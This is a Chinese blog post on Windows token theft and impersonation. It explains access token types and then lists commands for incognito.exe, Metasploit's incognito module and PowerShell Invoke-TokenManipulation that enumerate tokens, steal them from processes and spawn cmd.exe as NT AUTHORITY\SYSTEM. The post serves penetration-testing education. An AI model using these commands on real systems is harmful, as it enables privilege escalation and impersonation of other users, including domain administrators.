码迷,mamicode.com
首页 > 其他好文 > 详细

Token窃取与利用

时间:2020-11-08 16:53:22      阅读:21      评论:0      收藏:0      [点我收藏+]

标签:eal   引号   平台   实现   str   blog   rate   spl   invoke   

0x01 概述

令牌(token)是系统的临时秘钥,相当于账号和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌将持续存在于系统中,除非系统重新启动。令牌最大的特点就是随机性,不可预测,黑客或软件无法猜测出令牌。

假冒令牌可以假冒一个网络中的另一个用户进行各类操作。所以当一个攻击者需要域管理员的操作权限时候,需要通过假冒域管理员的令牌进行攻击。

令牌有很多种:

访问令牌(Access Token):表示访问控制操作主体的系统对象

会话令牌(Session Token):是交互会话中唯一的身份标识符。

密保令牌(Security Token):又叫做认证令牌或硬件令牌,是一种计算机身份校验的物理设备,例如U盾

Windows的AccessToken有两种类型:

Delegation Token:授权令牌,它支持交互式会话登录(例如本地用户直接登录、远程桌面登录访问)

Impresonation Token:模拟令牌,它是非交互的会话(例如使用net use访问共享文件夹)。

注:

两种token只在系统重启后清除

具有Delegation token的用户在注销后,该Token将变成Impersonation token,依旧有效

技术图片

可以看到当前是tests这个账户,点开一个firefox然后我们再切换用户,用administrator账号登录,查看token
incognito下载地址

incognito.exe list_tokens -u

技术图片

利用该token执行calc.exe

incognito.exe execute -c "GOD\test" calc.exe

技术图片

技术图片

0x02 Windows平台下的incognito

列举token:incognito.exe list_tokens -u

技术图片

复制token:incognito.exe execute [options]

提权至system
incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe

技术图片

伪造用户
技术图片

0x03 Metasploit中的incognito

在Metasploit中,可使用incognito实现token窃取,常用命令如下:

加载incognito:load incognito

列举token:list_tokens -u

查看当前token:getuid

提示至system权限:getsystem

token窃取:impersonate_token "NT AUTHORITY\SYSTEM"

从进程窃取:steal_token pid

返回之前token:rev2self or drop_token
成功通过token窃取实现权限切换

技术图片

技术图片

技术图片

技术图片

执行impersonate_token "NT AUTHORITY\SYSTEM"将权限切换至system

注:

需要加引号和双斜杠,"NT AUTHORITY\SYSTEM"

0x04 powershell

Invoke-TokenManipulation.ps1用法
下载地址

原理和功能同incognito类似,能够实际提权和降权

列举token:Invoke-TokenManipulation -Enumerate

提权至system:Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt authority\system"

复制进程token:Invoke-TokenManipulation -CreateProcess "cmd.exe" -ProcessId 500

还有更多用法可参考该脚本说明

Invoke-TokenManipulation -Enumerate

技术图片

Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt authority\system"

技术图片

Invoke-TokenManipulation -CreateProcess "cmd.exe" -ProcessId 500

技术图片

Token窃取与利用

标签:eal   引号   平台   实现   str   blog   rate   spl   invoke   

原文地址:https://www.cnblogs.com/yicunyiye/p/13926943.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!